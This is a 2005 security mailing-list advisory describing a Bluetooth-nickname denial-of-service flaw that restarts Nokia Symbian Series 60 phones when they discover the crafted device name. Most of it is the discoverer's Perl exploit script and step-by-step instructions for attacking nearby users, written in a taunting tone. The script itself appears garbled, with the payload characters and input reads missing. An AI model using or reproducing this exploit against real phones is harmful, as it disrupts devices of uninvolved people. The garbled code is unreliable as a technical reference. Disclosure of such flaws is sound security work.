#*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#* Title: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart Release Date: 03/06/2005 Vulnerability Type: Denial of serce via network Severity: Hight Model affected: All Symbian 60 Auth: http://www.nokia.com Disclaimer: ========== The information is provided "as is" without warranty of any kind. The author of this issue shall not be held liable for any damages due to the informations contained in this advisory. Vulnerability Description: ========================= Q-Nix reported a vulnerability in Nokia's Symbian operating system. A remote user can cause denial of service conditions. A remote user can set specially crafted nickname. Then, when a target user searches available Bluetooth devices and discovers the nickname, the target user's phone will restart. Q-Nix: "This exploit is for nokia symbian 60 (ser.60) , a vulnerability in nokia bluetooth , it cause a Remote restart for any one who search in bluetooth devices and find your nick name. BOOMB AND HIS PHONE RESTARTS !!! ..." 1- Run the exploit and make a nickname . 2- Send the output to your nokia phone . 3- Open the file in your mobile and copy the nickname . 4- Paste the nickname in bluetooth phone name . 5- Have a nice time ;) . my $btnick; my $bth; my $bts; my $file; $bth = " ."; print "\n*******************************************************\n"; print "** NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME **\n"; print "** BY QNIX | Q-nix[@]hotmail[dot]com **\n"; print "** GREETZ TO : vamp . beafcake , QatarBoy , C0NIK **\n"; print "** hailhackerz , QEX , HaXeR , Silentneedle **\n"; print "** And all Security 4 Arab members **\n"; print "*******************************************************\n"; print " \n WRITE YOUR BLUETOOTH NICKNAME : "; $btnick = ; chomp($btnick); print " \n OUTPUT : "; $file = ; chomp($file); open(BLUEN, ">>$file") || die "Could not create file $!\n"; $bts = "$btnick$bth"; print BLUEN ("$bts"); close(BLUEN); print "\n Done !! :D HAVE A NICE TIME L4m3rZ \n\n"; Credits: ======== Q-Nix Greets to : Vamp, Beafcake, QatarBoy, C0NIK, Hailhackerz, QEX, HaXeR, Silentneedle #*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#*